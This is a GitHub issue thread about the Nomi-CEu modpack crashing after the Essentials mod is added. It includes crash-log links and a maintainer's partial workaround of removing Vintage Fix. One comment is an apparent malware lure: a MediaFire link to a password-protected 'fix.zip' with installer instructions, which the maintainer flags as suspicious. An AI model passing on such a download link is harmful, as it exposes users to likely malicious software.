### ISSUE TITLE
game crashing when starting with Essentials installed

### ISSUE THREAD

**Issue by qajo-mc** [Nomi-CEu/Nomi-CEu#969]
### Nomi CEu Version

1.7

### Launcher

Curseforge (AT  Launcher did the same)

### Configurations or Mods Changed

only change i did was add essentials

### Environment

starting the game

### Mode

Normal Mode

### What Happened

-

### Expected Behavior

-

### Logs

[crash-2024-08-28_09.24.19-client.txt](https://github.com/user-attachments/files/16777978/crash-2024-08-28_09.24.19-client.txt)
[crash-2024-08-28_09.24.37-client.txt](https://github.com/user-attachments/files/16777979/crash-2024-08-28_09.24.37-client.txt)
[crash-2024-08-28_09.24.53-client.txt](https://github.com/user-attachments/files/16777980/crash-2024-08-28_09.24.53-client.txt)

[latest.log](https://github.com/user-attachments/files/16778438/latest.log)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IntegerLimit** [comment]
More suspicious comments...

**Comment by IntegerLimit** [comment]
There is a solution found:
Remove vintage fix from your instance.

This can be a temporary fix, until this issue is properly fixed.

**Comment by IntegerLimit** [comment]
Solution has a problem: game still crashes when joining / creating a world.
